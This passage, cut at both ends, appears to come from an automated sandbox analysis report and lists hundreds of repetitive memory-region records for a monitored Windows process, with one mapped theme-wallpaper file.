monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12093 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 12094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12095 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 12096 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12097 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12100 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12101 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12121 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12122 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12126 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12127 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12128 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12129 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12130 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12131 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12132 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12133 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12134 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12135 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12136 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12137 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12138 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12139 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12140 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12141 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12142 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12143 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12144 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12145 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12146 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12147 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12148 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12149 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12150 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12151 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12152 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12173 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12174 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12176 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12177 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12202 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12203 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12204 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12205 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12206 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12207 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12208 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12209 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12210 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12211 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12212 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12214 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12215 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12219 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12220 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12223 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12224 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12225 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12226 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12227 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12228 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12229 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12230 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12231 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12232 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12233 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12234 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12235 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12236 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12237 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12238 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12239 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12240 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12241 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12242 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12243 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12244 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12245 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12246 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12247 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12248 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12249 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12250 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12251 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12252 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12253 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12254 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12271 start_va = 